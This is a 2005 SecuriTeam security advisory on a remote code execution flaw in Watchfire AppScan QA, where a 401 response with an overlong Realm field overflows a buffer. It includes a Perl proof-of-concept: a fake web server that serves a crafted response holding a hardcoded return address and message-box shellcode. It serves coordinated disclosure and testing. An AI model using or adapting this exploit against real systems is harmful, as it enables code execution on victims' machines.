[NT] Watchfire AppScan QA Remote Code Execution

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Watchfire AppScan QA Remote Code Execution
------------------------------------------------------------------------


SUMMARY

AppScan QA is "an automated web application testing tool that provides QA 
personnel with security defect analysis and remediation information. 
Instead of manually searching for security defects, application testers 
trust AppScan QA to detect security defects and vulnerabilities 
automatically as an integrated component of enterprise development and 
testing processes. AppScan QA automates test script creation, 
modification, and maintenance to ensure reliable and repeatable testing". 
A vulnerability within Watchfire's AppScan allows remote attackers to 
cause the product to execute arbitrary code by overflowing its internal 
buffer used to store the HTTP response's Realm field.

DETAILS

Vulnerable Systems:
 * AppScan QA  version 5.0.609 / Subscription 7
 * AppScan QA  version 5.0.134

Immune Systems:
 * AppScan QA  version 5.0.609 / Subscription 8

The vulnerability specifically exists in the way AppScan QA processes 401 
HTTP responses. If a custom 401 response is specially crafted, containing 
a WWW-Authenticate header with the Realm field consisting of more than 351 
characters, a buffer overflow occurs, leading to remote code execution 
with the privileges of the user running AppScan QA.

Vendor Response:
 * 10/12/2005: Initial Vendor Contact.
 * 10/18/2005: Vendor Confirmed Vulnerability.
 * 11/02/2005: Vendor Releases Update.
 * 12/15/2005: Advisory Public Disclosure.

Exploit:
# Watchfire AppScan QA PoC - Coded by Mariano Nu z Di Croce @ CYBSEC
#
# How to use:
# 1. Run this script to setup the fake web server.
# 2. Scan the server with AppScan QA, either in Interactive or Manual 
mode.
# 3. If you get an "You are vulnerable!" popup, you should upgrade 
inmediatly.
#
# PoC developed for Windows 2000 Server SP4.
#

#!/usr/bin/perl -w

use IO::Socket::INET;

# Dissable buffering
$| = 1;

# Define 200 OK Responses
my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com" . "\r\nDate: Thu, 01 
Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\n" . 
"Keep-Alive: timeout=15, max=100\r\nConnection: Close\r\n" . 
"Content-Type: text/html; charset=ISO-8859-1\r\n\r\n<a 
href='/admin'>admin</a>";

# Define the 401 Auth Required Header and Tail
my $res401Head = "HTTP/1.1 401 Authorization Required\r\nHost: 
www.test.com\r\nDate: Thu, 01 Nov 2005 14:43:53 GMT\r\nServer: 
Apache\r\nWWW-Authenticate: Basic realm=\"";

my $res401Tail = "Content-Length: 401\r\nKeep-Alive: timeout=15, 
max=100\r\nConnection: Close\r\nContent-Type: text/html; 
charset=iso-8859-1\r\n\r\n<!DOCTYPE HTML PUBLIC \"-//IETF//DTD 
HTML2.0//EN\">\r\n<html><head>\r\n<title>401 Authorization 
Required</title>\r\n</head><body>\r\n<h1>Authorization 
Required</h1>\r\n<p>This server could not verify that you\r\nare 
authorized to access the document\r\nrequested.  Either you supplied the 
wrong\r\ncredentials (e.g., bad password), or your\r\nbrowser doesn't 
understand how to supply\r\nthe credentials 
required.</p>\r\n</body></html>";

# Ret - call ebx - in user32.dll (Windows 2000 Server SP4)
my $ret = pack("l", 0x77e11627);

my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb" . 
"\x21\x02\x59\x7c\x51\xff\xd3\xeb" . 
"\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c" . 
"\x59\x7c\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x13" . 
"\x52\x51\x51\x52\xff\xd0\x31\xd2\x52\xb8\xbe\x69" . 
"\x59\x7c\xff\xd0\xe8\xc6\xff\xff\xff\x75\x73\x65\x72" . 
"\x33\x32\x4e\xe8\xc8\xff\xff\xff\x4d\x65\x73\x73\x61" . 
"\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc8\xff\xff\xff\x59" . 
"\x6f\x75\x20\x61\x72\x65\x20\x76\x75\x6c\x6e\x65\x72" . 
"\x61\x62\x6c\x65\x21\x4e";

my $resExploit = $res401Head . "\x41"x347 . "\xeb\x06AA". $ret . $scode . 
"\"\r\n" . $res401Tail;

# Initialization of Fake WebServer
my $srv = IO::Socket::INET->new(LocalPort => 80,
          Reuse => 1,
    Listen => 1 ) || die "Could not create socket: $!\n";

print "Waiting for connections...\n";
       
while ($cli = $srv->accept()) {
 printf "Request from %s\n", $cli->peerhost;
 while (<$cli>) {
  if (s/(admin)/$1/) {
   # If Request is for "admin", launch the exploit
   printf "Request for protected resource detected...launching exploit\n";
   print $cli $resExploit;
  }
  else {
   # Else send a normal response
   print $cli $res200;
  }
 }
 close($cli);
}
close($srv);


ADDITIONAL INFORMATION

The information has been provided by  <mailto:mnunez@cybsec.com> Mariano 
Nunez Di Croce.
The original article can be found at:  
<http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_AppScanQA_RemoteCodeExec.pdf>
 CYBSEC Security Advisory AppScanQA RemoteCodeExec (pdf)



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.